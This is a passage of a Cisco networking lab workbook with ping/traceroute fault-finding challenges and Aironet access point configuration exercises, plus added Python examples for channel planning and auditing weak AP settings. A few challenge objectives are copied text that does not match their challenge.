R5, S1.

Note: The IP addresses for the routers have been hidden, so that it is not possible to simply
view the addresses, rather than actually fault-finding.

Fault Challenge 10
Fault:

Port shutdown on a port in the network

Outline
The devices have been set but there is a fault in the status of one of the ports or on the
gateways of the hosts. As we have a ring the devices may still give a ping, but the traceroute
will give unexpected results. The addresses of the nodes are:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

The interconnected networks are:
10.1.1.0, 10.2.2.0, 10.3.3.0, 10.4.4.0 and 10.5.5.0.

Objectives
One of the ports has been shutdown. Use PING and TRACEROUTE to find it. Possible
solutions:

R1, E0.
R1, S0.
R1, E1.
R2, E0.
R2, E1.
R3, E0.
R3, E1.
R3, S0.
R4, E0.
R4, E1.
R4, S0.
R5, S0.
R5, S1.

Note: The IP addresses for the routers have been hidden, so that it is not possible to simply
view the addresses, rather than actually fault-finding.

Fault Challenge 11
Fault:

Routing protocol problems

Outline
The devices have been set but there is a fault in the routing network definition. As we have
a ring the devices may still give a ping, but the traceroute will give unexpected results. Once
you have found the fault, fix it. The addresses of the nodes are:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

The interconnected networks are:
10.1.1.0, 10.2.2.0, 10.3.3.0, 10.4.4.0 and 10.5.5.0.

Objectives
One of the ports has been shut down. Use PING and TRACEROUTE to find it.

Fault Challenge 12
Fault:

ACL applied on an incoming port for ICMP.

Outline
An ACL which blocks incoming ICMP pings has been added ... find it and remove it. Once
you have found the fault, fix it. The addresses of the nodes are:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

The interconnected networks are:
10.1.1.0, 10.2.2.0, 10.3.3.0, 10.4.4.0 and 10.5.5.0.

Objectives
ICMP deny has been applied to one of the incoming ports, find it, and remove it. Use PING
and TRACEROUTE. Remember, as it's a ring you will still be able to ping and traceroute, but
it might take a longer route, as there could be an alternative route. Example solutions:

ICMP Deny applied to incoming port of R1, E0.
ICMP Deny applied to incoming port of R1, E1.
ICMP Deny applied to incoming port of R1, S0.
ICMP Deny applied to incoming port of R2, E0.
ICMP Deny applied to incoming port of R2, E1.
and so on.

Fault Challenge 13
Fault:

An extended ACL applied on an outgoing port.

Outline
An ACL which blocks outgoing ICMP pings has been added ... find it and remove it. Once
you have found the fault, fix it. The addresses of the nodes are:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

The interconnected networks are:
10.1.1.0, 10.2.2.0, 10.3.3.0, 10.4.4.0 and 10.5.5.0.

Objectives
ICMP deny has been applied to one of the outgoing ports, find it, and remove it. Use PING
and TRACEROUTE. Remember, as it's a ring you will still be able to ping and traceroute, but
it might take a longer route, as there could be an alternative route. Example solutions:

ICMP Deny applied to outgoing port of R1, E0.
ICMP Deny applied to outgoing port of R1, E1.
ICMP Deny applied to outgoing port of R1, S0.
ICMP Deny applied to outgoing port of R2, E0.
ICMP Deny applied to outgoing port of R2, E1.
and so on.

Fault Challenge 14
Fault:

An ACL which bars one of the hosts.

Outline
This topology has an ACL set which bars either H1, H2 or H3, but no other nodes. Try
pinging around and performing traceroutes to find the ACL. The addresses of the nodes
are:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

The interconnected networks are:
10.1.1.0, 10.2.2.0, 10.3.3.0, 10.4.4.0 and 10.5.5.0.

Objectives
This topology has an ACL set which bars either H1, H2 or H3, but no other nodes. Try
pinging around and performing traceroutes to find the ACL. Example solutions:

Acl Deny H1 on R1, E1.
Acl Deny H1 on R3, E1.
Acl Deny H1 on R4, E1.
Acl Deny H3 on R4, S0.
Acl Deny H2 on R3, S0.
Acl Deny H1 on R3, E0.

Fault Challenge 15
Fault:

An extended ACL which bars a whole subnet access to a single host

Outline
This topology has an extended ACL set which bars hosts from a host subnet access to a
single host. The addresses of the nodes are:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

The interconnected networks are:
10.1.1.0, 10.2.2.0, 10.3.3.0, 10.4.4.0 and 10.5.5.0.

Objectives
This topology has an extended ACL set which bars hosts from a host subnet access to a
single host. Example solutions:

Acl R1, E1, where all hosts on the subnet that H1 is on cannot ping a single host: H2. You
should be able to ping the port 192.168.1.1 as it only blocks for one destination.
Acl R1, E1, where all hosts on the subnet that H1 is on cannot ping a single host: H3. You
should be able to ping the port 192.168.2.1 as it only blocks for one destination.
Acl R3, E0, where all hosts on the subnet that H2 is on cannot ping a single host: H1. You
should be able to ping the port 192.168.1.1 as it only blocks for one destination.
Acl R3, E0, where all hosts on the subnet that H2 is on cannot ping a single host: H3. You
should be able to ping the port 192.168.2.1 as it only blocks for one destination.
and so on.

Fault Challenge 16
Fault:

Disabled port on a switch or a router

Outline
This topology has a disabled port on the switch or on the routers. The addresses of the
nodes are:
H1- 192.168.0.2 [Gateway: 192.168.0.1]
H2- 192.168.1.2 [Gateway: 192.168.1.1]

and:
R1, E0: 1.2.3.4
R1, E1: 192.168.0.1
R2, E0: 1.2.3.5
R2, E1: 192.168.1.1
R3, E0: 1.2.3.6
R4, E0: 1.2.3.7
R5, E0: 1.2.3.8

Objectives
This topology has an extended ACL set which bars hosts from a host subnet access to a
single host. Example solutions:

Switch Port FA0/1.
Switch Port FA0/2.
Switch Port FA0/3.
Switch Port FA0/4.
Switch Port FA0/5.
Switch Port R1 E0.
Switch Port R2 E0.
Switch Port R3 E0.
Switch Port R4 E0.
Switch Port R5 E0.
Switch Port R1 E1.
Switch Port R3 E1.

Fault Challenge 17
Fault:

Incorrect assignment of a VLAN

Outline
This topology has one of the switch ports incorrectly assigned to the wrong VLAN. The
addresses of the nodes are:
H1- 192.168.0.2 [Gateway: 192.168.0.1]
H2- 192.168.1.2 [Gateway: 192.168.1.1]

and:
R1, E0: 1.2.3.4
R1, E1: 192.168.0.1
R2, E0: 1.2.3.5
R2, E1: 192.168.1.1
R3, E0: 1.2.3.6
R4, E0: 1.2.3.7
R5, E0: 1.2.3.8

Objectives
This topology has an extended ACL set which bars hosts from a host subnet access to a
single host. Example solutions:

Switch Port FA0/1 on VLAN 2.
Switch Port FA0/2 on VLAN 2.
Switch Port FA0/3 on VLAN 2.
Switch Port FA0/4 on VLAN 2.
Switch Port FA0/5 on VLAN 2.

Wireless

Cisco Wireless Challenge 1

Outline
This challenge involves the configuration of the BVI interface.
Objectives
The objectives of this challenge are to:

Setup the IP address of the BVI interface.
Setup the subnet mask of the BVI interface.
Define the description of the BVI interface.
Enable E0.
Define the description of the E0 port.
Define Ethernet details on the E0 port.

Example
> enable
ap# sh version
Cisco IOS Software, C1200 Software (C1200-K9W7-M), Version 12.3(8)JA, RELEASE SOFTWARE
(fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2006 by Cisco Systems, Inc.
Compiled Mon 27-Feb-06 09:09 by ssearch
ROM: Bootstrap program is C1200 boot loader
BOOTLDR: C1200 Boot Loader (C1200-BOOT-M) Version 12.3(2)JA4, RELEASE SOFTWARE (fc1)
ap uptime is 28 minutes
System returned to ROM by power-on
System image file is "flash:/c1200-k9w7-mx.123-8.JA/c1200-k9w7-mx.123-8.JA"
This product contains cryptographic features and is subject to United
States and local country laws governing import, export, transfer and
use. Delivery of Cisco cryptographic products does not imply
third-party authority to import, export, distribute or use encryption.
Importers, exporters, distributors and users are responsible for
compliance with U.S. and local country laws. By using this product you
agree to comply with applicable laws and regulations. If you are unable
to comply with U.S. and local laws, return this product immediately.
A summary of U.S. laws governing Cisco cryptographic products may be found at:
http://www.cisco.com/wwl/export/crypto/tool/stqrg.html

If you require further assistance please contact us by sending email to
export@cisco.com.
cisco AIR-AP1231G-E-K9 (PowerPC405GP) processor (revision A0) with 15038K/1336K bytes of memory.
Processor board ID FOC101311BH
PowerPC405GP CPU at 196Mhz, revision number 0x0145
Last reset from power-on
1 FastEthernet interface
1 802.11 Radio(s)
32K bytes of flash-simulated non-volatile configuration memory.
Base ethernet MAC Address: 00:17:59:67:5E:9D
Part Number                          : 73-8704-11
PCA Assembly Number                  : 800-23211-12
PCA Revision Number                  : A0
PCB Serial Number                    : FOC101311BH
Top Assembly Part Number             : 800-23304-13
Top Assembly Serial Number           : FCZ1019Z0T3
Top Revision Number                  : A0
Product/Model Number                 : AIR-AP1231G-E-K9
Configuration register is 0xF
ap# sh controller
!
interface Dot11Radio0
Radio AIR-MP21G, Base Address 0017.5ab7.ff60, BBlock version 0.00, Software version
5.90.8
Serial number: FOC1011C7A8
Number of supported simultaneous BSSID on Dot11Radio0: 8
Carrier Set: EMEA (EU )
Uniform Spreading Required: No
Current Frequency: 2417 MHz Channel 2
Allowed Frequencies: 2412(1) 2417(2) 2422(3) 2427(4) 2432(5) 2437(6) 2442(7) 2447(8)
2452(9) 2457(10) 2462(11) 2467(12) 2472(13)
Listen Frequencies: 2412(1) 2417(2) 2422(3) 2427(4) 2432(5) 2437(6) 2442(7) 2447(8)
2452(9) 2457(10) 2462(11) 2467(12) 2472(13) 2484(14)
Current CCK Power: 50 mW
Allowed CCK Power Levels: 1 5 10 20 30 50
Current OFDM Power: 30 mW
Allowed OFDM Power Levels: 1 5 10 20 30
Allowed Client Power Levels: 1 5 10 20 30 50
ERP settings: short slot time.
Neighbors in non-erp mode:
Current Rates:
basic-1.0 basic-2.0 basic-5.5 6.0 9.0 basic-11.0 12.0 18.0 24.0 36.0
48.0 54.0
Active Rates: basic-1.0 basic-2.0 basic-5.5 6.0 9.0 basic-11.0 12.0 18.0 24.0 36.0 48.0
54.0
Allowed Rates: 1.0 2.0 5.5 6.0 9.0 11.0 12.0 18.0 24.0 36.0 48.0 54.0
Best Range Rates: basic-1.0 2.0 5.5 6.0 9.0 11.0 12.0 18.0 24.0 36.0 48.0 54.0
Best Throughput Rates:
basic-1.0 basic-2.0 basic-5.5 basic-6.0 basic-9.0 basic-11.0
basic-12.0 basic-18.0 basic-24.0 basic-36.0 basic-48.0 basic-54.0
Default Rates:
basic-1.0 basic-2.0 basic-5.5 6.0 9.0 basic-11.0 12.0 18.0 24.0 36.0
48.0 54.0
Current Voice Rates:
5.5 6.0 11.0 12.0 24.0 [disabled until voice packet-discard
enabled]
Default Voice Rates: 5.5 6.0 11.0 12.0 24.0
Channel / Max Power Table
1 O=15 D=17,
2 O=15 D=17,
3 O=15 D=17,
4 O=15 D=17,
5 O=15 D=17
6 O=15 D=17,
7 O=15 D=17,
8 O=15 D=17,
9 O=15 D=17,
10 O=15 D=17
11 O=15 D=17,
12 O=15 D=17,
13 O=15 D=17
Data Rate Sensitivity (rate, SNR dB, Contention dBm)
( 1.0, 1, -98)
( 2.0, 7, -94)
( 5.5, 9, -92)
( 6.0, 7, -92)
( 9.0, 14, -87)
(12.0, 12, -87)

(11.0, 16, -86)
(18.0, 15, -84)
(24.0, 17, -82)
(36.0, 24, -76)
(48.0, 29, -73)
(54.0, 33, -69)
Radio Management (RM) Configuration:
Regular AP RM Mode 1
Temp Setting Disabled
Temp Settings: AP Tx Power 0
AP Tx Channel 0
Client Tx Power 0
ap# show running-config
Using 1413 out of 32768 bytes
!
version 12.3
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
service password-encryption
!
hostname ap
!
enable secret 5 $1$a2Og$asLICPwL7.HnsvvykNOus1
!
ip subnet-zero
ip domain name test.com
!
!
username Cisco password 7 1531021F0725
!
bridge irb
!
!
interface Dot11Radio0
no ip address
no ip route-cache
!
encryption mode ciphers tkip
!
ssid bill
!
speed basic-1.0 basic-2.0 basic-5.5 6.0 9.0 basic-11.0 12.0 18.0 24.0 36.0 48.0 54.0
station-role root
world-mode legacy
bridge-group 1
bridge-group 1 subscriber-loop-control
bridge-group 1 block-unknown-source
no bridge-group 1 source-learning
no bridge-group 1 unicast-flooding
bridge-group 1 spanning-disabled
!
interface FastEthernet0
no ip address
no ip route-cache
duplex auto
speed auto
bridge-group 1
no bridge-group 1 source-learning
bridge-group 1 spanning-disabled
hold-queue 160 in
!
interface BVI1
ip address 10.0.0.1 255.255.255.0
no ip route-cache
!
ip http server
no ip http secure-server
ip http help-path http://www.cisco.com/warp/public/779/smbiz/prodconfig/help/eag
!
!
control-plane
!
bridge 1 route ip
!


!
!
line con 0
line vty 0 4
login local
!
end
# config t
(config)# int bvi 1
ap(config-if)# ip address ?
A.B.C.D  IP address
pool     IP Address autoconfigured from a local DHCP pool
ap(config-if)# ip address 158.234.223.7 ?
A.B.C.D IP subnet mask
(config-if)# ip address 158.234.223.7 255.192.0.0
(config-if)# description cisco
(config-if)# int fa0
(config-if)# no shut
(config-if)# description production depart
(config-if)# speed 10
(config-if)# int d0
(config-if)# no shut

Explanation
One of the most popular access points for creating infrastructure networks is the Cisco
Aironet 1200 device, which is an industry-standard wireless access point. It has two main
networking ports: a radio port named Dot11Radio0 (D0) and an Ethernet port (E0 or FA0).
Each of these ports can be programmed with an IP address, but a special interface named
BVI1 is normally used to define the IP address for both ports. Figure 1 outlines this, and
how the port is programmed.
... diagrams missed out in this version

Cisco Wireless Challenge 2


Outline
This challenge involves the configuration of the E0 interface.

Objectives
The objectives of this challenge are to:

Setup the IP address of the BVI interface.
Setup the subnet mask of the BVI interface.
Enable E0.
Define the description of the E0 port.
Define Ethernet details on the E0 port.
Enable CDP on E0.

Example
> enable
# config t
(config)# int bvi1
(config-if)# ip address 158.234.223.7 255.192.0.0
(config-if)# description cisco
(config-if)# int fa0
(config-if)# no shut
(config-if)# description production depart
(config-if)# speed 10
(config-if)# duplex full
(config-if)# cdp ?
enable  Enable CDP on interface
log     Log messages generated by CDP
(config-if)# cdp enable

Cisco Wireless Challenge 3


Outline
This challenge involves the configuration of a few details including the hostname and
default gateway.

Objectives
The objectives of this challenge are to:

Setup the IP address of the BVI interface.
Setup the subnet mask of the BVI interface.
Enable D0.
Define the hostname.
Define the default gateway.

Example
> en
# config t
(config)# int bvi1
(config-if)# ip address 202.86.171.1 255.255.255.254
(config-if)# int d0
(config-if)# no shut
(config-if)# exit
(config)# hostname oslo
oslo (config)# ip default-gateway ?
A.B.C.D IP address of default gateway
oslo (config)# ip default-gateway 136.182.33.11

oslo (config)#

Explanation
Another important configuration is the default gateway, which is used to redirect any data
packets which are not destined for the local network. The wireless access point sends these
data packets, which have an unknown destination, to the default gateway, which will,
hopefully, find a destination for them, or at least know of another router which might be
able to help in routing the packets. In most cases the default gateway is defined as the IP
address of the router port which connects to the Ethernet connection of the wireless access
point. An example configuration is:
# config t
(config)# ip ?
(config)# ip default-gateway ?
(config)# ip default-gateway 192.168.1.254
(config)# exit

Cisco Wireless Challenge 4


Outline
This challenge involves the configuration of an SSID and the radio channel. It also defines
the default gateway, the domain name and the hostname. Note there is a change in Cisco IOS
12.3.
Objectives
The objectives of this challenge are to:

Define the SSID on the radio port.
Define the radio channel.
Define the default gateway.
Define the domain name.
Define the hostname.

Example IOS Version 12.3


> en
# config t
(config)# dot11 ssid minnesota
(config-ssid)# ?
ssid configuration commands:
  accounting           radius accounting
  admit-traffic        admit traffic
  authentication       authentication method
  exit                 Exit from ssid sub mode
  guest-mode           guest ssid
  information-element  Add information element
  infrastructure-ssid  ssid used to associate to other infrastructure devices
  ip                   IP options
  max-associations     set maximum associations for ssid
  mbssid               Multiple BSSID
  mobility             enable L3 mobility
  no                   Negate a command or set its defaults
  vlan                 bind ssid to vlan
  wpa-psk              Configure Wi-Fi Protected Access pre-shared key
(config-ssid)# exit
(config)# int d0
(config-if)# ssid ?
LINE radio Service Set ID (Up to 32 characters)
(config-if)# ssid minnesota
(config-if)# int d0
(config-if)# channel ?
<1-2472>         One of: 1 2 3 4 5 6 7 8 9 10 11 12 13 2412 2417 2422 2427 2432 2437 2442 2447 2452 2457 2462 2467 2472
least-congested  Scan for best frequency
(config-if)# channel 1
(config-if)# exit
(config)# ip default-gateway 205.98.14.11
(config)# ip domain-name ?
WORD Default domain name
(config)# ip domain-name moray.ll
(config)# hostname northdakota

Note that the setting of SSID is now done in the global configuration mode, and the SSID is
then associated with the D0 port.
Example IOS Version 12.1
> en
# config t
(config)# int d0
(config-if)# ssid minnesota
(config-if-ssid)# exit
(config-if)# int d0
(config-if)# channel ?
<1-2472>         One of: 1 2 3 4 5 6 7 8 9 10 11 12 13 2412 2417 2422 2427 2432 2437 2442 2447 2452 2457 2462 2467 2472
least-congested  Scan for best frequency
(config-if)# channel 1
(config-if)# exit
(config)# ip default-gateway 205.98.14.11
(config)# ip domain-name moray.ll
(config)# hostname northdakota

Explanation
The radio SSID (Service Set ID) uniquely identifies a wireless network within a limited
physical domain. It is set up within the access point with:
# config t
(config)# int dot11radio0
(config-if)# ssid fred
(config-if-ssid)# guest-mode


which sets up an SSID of fred, and allows guest-mode. Along with the SSID it is also
possible to define a beacon time where a beacon signal is sent out at a given time interval,
such as:
# config t
(config)# int dot11radio0
(config-if)# beacon ?
dtim-period  dtim period
period       beacon period
(config-if)# beacon period ?
<20-4000> Kusec (or msec)
(config-if)# beacon period 1000

which defines a beacon period of 1000 ms (1 second).


The channel setting is an important one, as it defines the basic identification of the
communications channel. In Europe there are 14 channels available which limits the number
of simultaneous connections, where each channel is numbered from 1 to 14, each of which
has their own transmission/reception frequency, as illustrated in Figure 1. Careful planning
of these channels is important, especially in creating wireless domains which are
overlapping as this allows users to roam around the physical space. The example in Figure 1
shows that it is possible to achieve good coverage, without overlapping domains with the
same frequency, with just three channels.

Channel  Frequency (MHz)
1        2412
2        2417
3        2422
4        2427
5        2432
6        2437
7        2442
8        2447
9        2452
10       2457
11       2462
12       2467
13       2472
14       2484

Figure 1: Channels in an area (diagram not reproduced in this version)

The channel is set within the D0 interface:

(config)# int dot11radio0
(config-if)# channel ?
<1-2472>         One of: 1 2 3 4 5 6 7 8 9 10 11 12 13 2412 2417 2422 2427 2432 2437 2442 2447 2452 2457 2462 2467 2472
least-congested  Scan for best frequency
(config-if)# channel 7
(config-if)# no shutdown
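Added example, not NetworkSims code, working through the channel-planning point above: the centre frequency of each channel (the table in the text), which channels overlap for a given channel width, a non-overlapping plan computed for the channels the access point's "Allowed Frequencies" list permits, and a check of an AP-to-channel assignment for neighbouring cells that collide. It goes beyond the text by computing the plan rather than reading it off Figure 1; the 22 MHz width is the 802.11b/g DSSS channel width, and the AP neighbour map in main() is constructed.

```python
"""2.4 GHz channel planning: frequency per channel, overlap, a greedy
non-overlapping plan and an assignment check. Added example, not
NetworkSims code; the site map in main() is constructed."""
from typing import Dict, Iterable, List, Sequence, Tuple

DSSS_CHANNEL_WIDTH_MHZ = 22  # 802.11b/g occupied bandwidth per channel


def channel_frequency(channel: int) -> int:
    """Centre frequency in MHz. Channels 1-13 are spaced 5 MHz apart starting
    at 2412 MHz; channel 14 is the exception at 2484 MHz (as in the table)."""
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    if channel == 14:
        return 2484
    raise ValueError(f"no 2.4 GHz channel numbered {channel}")


def channels_overlap(a: int, b: int, width_mhz: int = DSSS_CHANNEL_WIDTH_MHZ) -> bool:
    """Two channels interfere when their centres are closer than one channel width."""
    return abs(channel_frequency(a) - channel_frequency(b)) < width_mhz


def non_overlapping_plan(allowed: Iterable[int],
                         width_mhz: int = DSSS_CHANNEL_WIDTH_MHZ) -> List[int]:
    """Greedy plan: walk the allowed channels upwards and keep each one that
    does not overlap any channel already chosen."""
    chosen: List[int] = []
    for ch in sorted(allowed):
        if all(not channels_overlap(ch, c, width_mhz) for c in chosen):
            chosen.append(ch)
    return chosen


def plan_is_clean(plan: Sequence[int], width_mhz: int = DSSS_CHANNEL_WIDTH_MHZ) -> bool:
    """True when no two channels in the plan overlap."""
    return all(not channels_overlap(a, b, width_mhz)
               for i, a in enumerate(plan) for b in plan[i + 1:])


def assignment_conflicts(neighbours: Sequence[Tuple[str, str]],
                         channel_of: Dict[str, int]) -> List[Tuple[str, str]]:
    """Pairs of APs whose cells overlap physically (the neighbour list) and
    whose channels also overlap in frequency: the interference the text
    warns about when overlapping domains reuse a frequency."""
    return [(a, b) for a, b in neighbours
            if channels_overlap(channel_of[a], channel_of[b])]


if __name__ == "__main__":
    allowed_eu = range(1, 14)  # 1-13, the access point's "Allowed Frequencies" above
    print("greedy plan for channels 1-13:", non_overlapping_plan(allowed_eu))
    print("1/7/13 clean:", plan_is_clean([1, 7, 13]))
    # Constructed site: four APs; each pair listed has physically overlapping cells.
    cells = [("AP-A", "AP-B"), ("AP-B", "AP-C"), ("AP-A", "AP-D")]
    channels = {"AP-A": 1, "AP-B": 6, "AP-C": 11, "AP-D": 3}
    print("conflicting neighbours:", assignment_conflicts(cells, channels))
```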


Cisco Wireless Challenge 5


Outline
This challenge involves the configuration of passwords and a user.
Objectives
The objectives of this challenge are to:

Define the privileged and sec: passwords.
Define a user and password.
Enable the HTTP server.

Example
> en
# config t
(config)# enable ?
last-resort  Define enable action if no TACACS servers respond
password     Assign the privileged level password
secret       Assign the privileged level secret
use-tacacs   Use TACACS to check enable passwords
ap(config)# enable password ?
0      Specifies an UNENCRYPTED password will follow
7      Specifies a HIDDEN password will follow
LINE   The UNENCRYPTED (cleartext) 'enable' password
level  Set exec level password
(config)# enable password hotel
ap(config)# enable sec ?
0      Specifies an UNENCRYPTED password will follow
5      Specifies an ENCRYPTED secret will follow
LINE   The UNENCRYPTED (cleartext) 'enable' secret
level  Set exec level password
(config)# enable secret hotel
(config)# username lynn password foxtrot
(config)# ip http server
(config)# ip subnet-zero

Explanation
A wireless access point is typically accessible through the TELNET and/or HTTP protocol.
The HTTP service is important as it allows remote access through a Web browser, and can
be authenticated locally with:
# config t
(config)# username ?
(config)# username fred password bert
(config)# ip http ?
(config)# ip http server
(config)# ip http authentication local
(config)# exit
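Added example, not NetworkSims code: an audit of an access-point running-config for the management settings the challenges above configure, flagging `enable password` and `username ... password` (cleartext or type 7, both recoverable, so they should be `secret`), `ip http server` left on without `ip http secure-server`, TKIP as the radio cipher, and vty lines whose transport is not restricted to SSH. Both configs are constructed to resemble the running-config shown in Wireless Challenge 1 (with placeholder hashes), and the rule names are this example's own.

```python
"""Audit an access-point running-config for weak management settings.
Added example, not NetworkSims code; the two configs are constructed to
resemble the Wireless Challenge 1 running-config, with placeholder hashes."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

WEAK_CONFIG = """\
enable secret 5 $1$PLACEHOLDER
enable password 7 PLACEHOLDER
username Cisco password 7 PLACEHOLDER
!
interface Dot11Radio0
 no ip address
 !
 encryption mode ciphers tkip
 !
 ssid bill
!
ip http server
no ip http secure-server
!
line vty 0 4
 login local
"""

HARDENED_CONFIG = """\
enable secret 5 $1$PLACEHOLDER
username admin secret 5 $1$PLACEHOLDER
!
interface Dot11Radio0
 encryption mode ciphers aes-ccm
 ssid bill
!
no ip http server
ip http secure-server
!
line vty 0 4
 login local
 transport input ssh
"""


@dataclass(frozen=True)
class Finding:
    rule: str
    where: str  # "global" or the header of the block the line belongs to
    line: str


def split_config(config: str) -> Tuple[List[str], Dict[str, List[str]]]:
    """Split IOS config text into global commands and per-block sub-commands.
    'show running-config' indents sub-commands by one space; '!' is only a
    separator (it also appears inside the radio interface block), so
    indentation, not '!', decides where a block ends."""
    top: List[str] = []
    blocks: Dict[str, List[str]] = {}
    current = None
    for raw in config.splitlines():
        text = raw.strip()
        if not text or text == "!":
            continue
        if raw.startswith(" "):
            if current is not None:
                blocks[current].append(text)
            continue
        if text.startswith(("interface ", "line ")):
            current = text
            blocks.setdefault(current, [])
        else:
            current = None
            top.append(text)
    return top, blocks


def audit(config: str) -> List[Finding]:
    top, blocks = split_config(config)
    found: List[Finding] = []
    for line in top:
        if line.startswith("enable password"):
            found.append(Finding("enable-password", "global", line))
        if re.match(r"^username \S+ password ", line):
            found.append(Finding("reversible-user-password", "global", line))
    if "ip http server" in top and "ip http secure-server" not in top:
        found.append(Finding("http-without-https", "global", "ip http server"))
    for header, subs in blocks.items():
        if header.startswith("interface Dot11Radio"):
            for sub in subs:
                if sub.startswith("encryption mode ciphers") and "tkip" in sub:
                    found.append(Finding("tkip-cipher", header, sub))
        if header.startswith("line vty"):
            transports = [s for s in subs if s.startswith("transport input")]
            if transports != ["transport input ssh"]:
                found.append(Finding("vty-not-ssh-only", header,
                                     transports[0] if transports else "(no transport input line)"))
    return found


if __name__ == "__main__":
    for f in audit(WEAK_CONFIG):
        print(f"{f.rule:26} {f.where:22} {f.line}")
    print("hardened config findings:", audit(HARDENED_CONFIG))
```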

Cisco Wireless Challenge 6


Outline
This challenge involves the configuration of radio port settings. Note there is a change in
Cisco IOS 12.3.
Objectives
The objectives of this challenge are to:

Define the privileged and secret passwords.
Define a user and password.
Enable the HTTP server.

Example IOS Version 12.3


> enable
# config t
(config)# dot11 ssid fred
(config-ssid)# max-assoc ?
<1-255> association limit
(config-ssid)# max-assoc 9
(config-ssid)# exit
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config-if)# int d0
(config-if)# beacon ?
dtim-period  dtim period
period       beacon period
(config-if)# beacon period ?
<20-4000>  Kusec (or msec)
(config-if)# beacon period 2000
(config-if)# power ?
client  Client radio transmitter power level
local   Local radio transmitter power level
(config-if)# power local ?
<1-50>   One of: 1 5 20 30 50
maximum  Set local power to allowed maximum
(config-if)# power local 5
(config-if)# power client ?
<1-50>   One of: 1 5 20 30 50
maximum  Set client power to allowed maximum
(config-if)# power client 5


(config-if)# ?
Interface configuration commands:
  access-expression       Build a bridge boolean access expression
  antenna                 dot11 radio antenna setting
  arp                     Set arp type (arpa, probe, snap) or timeout
  bandwidth               Set bandwidth informational parameter
  beacon                  dot11 radio beacon
  bridge-group            Transparent bridging interface parameters
  broadcast-key           Configure broadcast key rotation period
  carrier-delay           Specify delay for interface transitions
  cdp                     CDP interface subcommands
  channel                 Set the radio frequency
  countermeasure          countermeasure
  custom-queue-list       Assign a custom queue list to an interface
  dampening               Enable event dampening
  default                 Set a command to its defaults
  delay                   Specify interface throughput delay
  description             Interface specific description
  dot11                   IEEE 802.11 config interface commands
  dot1x                   IEEE 802.1X subsystem
  encryption              Configure dot11 encryption parameters
  exit                    Exit from interface configuration mode
  fair-queue              Enable Fair Queuing on an Interface
  fragment-threshold      IEEE 802.11 packet fragment threshold
  help                    Description of the interactive help system
  hold-queue              Set hold queue depth
  infrastructure-client   Reserve a dot11 virtual interface for a WGB client
--More------ press any key --
  ip                      Interface Internet Protocol config commands
  keepalive               Enable keepalive
  l2-filter               Set Layer2 ACL for packet received by upper layer protocols
  load-interval           Specify interval for load calculation for an interface
  logging                 Configure logging for interface
  loopback                Configure internal loopback on an interface
  mac-address             Manually set interface MAC address
  max-reserved-bandwidth  Maximum Reservable Bandwidth on an Interface
  mtu                     Set the interface Maximum Transmission Unit (MTU)
  no                      Negate a command or set its defaults
  ntp                     Configure NTP
  packet                  max packet retries
  parent                  Specify parents with which to associate
  payload-encapsulation   IEEE 802.11 packet encapsulation
  power                   Set radio transmitter power levels
  preamble-short          Use 802.11 short radio preamble
  priority-group          Assign a priority group to an interface
  random-detect           Enable Weighted Random Early Detection (WRED) on an Interface
  rts                     dot11 Request To Send
  service-policy          Configure QoS Service Policy
  shutdown                Shutdown the selected interface
  snmp                    Modify SNMP interface parameters
  speed                   Set allowed radio bit rates
--More------ press any key --
  ssid                    Configure radio service set parameters
  station-role            role of the radio
  timeout                 Define timeout values for this interface
  traffic-class           Radio traffic class parameters
  transmit-interface      Assign a transmit interface to a receive-only interface
  tx-ring-limit           Configure PA level transmit ring limit
  world-mode              Dot11 radio world mode

NetworkSims.com

351

(config-if)# world-mode ?
<cr>
(config-if)# world-mode
(config-if)# no shut
(config-if)# speed ?
1.0         Allow 1 Mb/s rate
11.0        Allow 11 Mb/s rate
2.0         Allow 2 Mb/s rate
5.5         Allow 5.5 Mb/s rate
basic-1.0   Require 1 Mb/s rate
basic-11.0  Require 11 Mb/s rate
basic-2.0   Require 2 Mb/s rate
basic-5.5   Require 5.5 Mb/s rate
range       Set rates for best range
throughput  Set rates for best throughput
<cr>
(config-if)# speed 1.0
(config-if)# ssid fred

Example IOS Version 12.1


> enable
# config t
(config)# int bvi1
(config-if)# ip address 208.1.7.8 255.255.255.224
(config-if)# int d0
(config-if)# beacon ?
dtim-period  dtim period
period       beacon period
(config-if)# beacon period ?
<20-4000>  Kusec (or msec)
(config-if)# beacon period 2000
(config-if)# power ?
client  Client radio transmitter power level
local   Local radio transmitter power level
(config-if)# power local ?
<1-50>   One of: 1 5 20 30 50
maximum  Set local power to allowed maximum
(config-if)# power local 5
(config-if)# power client ?
<1-50>   One of: 1 5 20 30 50
maximum  Set client power to allowed maximum
(config-if)# power client 5
(config-if)# ?
Interface configuration commands:
access-expression       Build a bridge boolean access expression
antenna                 dot11 radio antenna setting
arp                     Set arp type (arpa, probe, snap) or timeout
bandwidth               Set bandwidth informational parameter
beacon                  dot11 radio beacon
bridge-group            Transparent bridging interface parameters
broadcast-key           Configure broadcast key rotation period
carrier-delay           Specify delay for interface transitions
cdp                     CDP interface subcommands
channel                 Set the radio frequency
countermeasure          countermeasure
custom-queue-list       Assign a custom queue list to an interface
dampening               Enable event dampening
default                 Set a command to its defaults
delay                   Specify interface throughput delay
description             Interface specific description
dot11                   IEEE 802.11 config interface commands
dot1x                   IEEE 802.1X subsystem
encryption              Configure dot11 encryption parameters
exit                    Exit from interface configuration mode
fair-queue              Enable Fair Queuing on an Interface
fragment-threshold      IEEE 802.11 packet fragment threshold
help                    Description of the interactive help system
hold-queue              Set hold queue depth
infrastructure-client   Reserve a dot11 virtual interface for a WGB client
ip                      Interface Internet Protocol config commands
keepalive               Enable keepalive
l2-filter               Set Layer2 ACL for packet received by upper layer protocols
load-interval           Specify interval for load calculation for an interface
logging                 Configure logging for interface
loopback                Configure internal loopback on an interface
mac-address             Manually set interface MAC address
max-reserved-bandwidth  Maximum Reservable Bandwidth on an Interface
mtu                     Set the interface Maximum Transmission Unit (MTU)
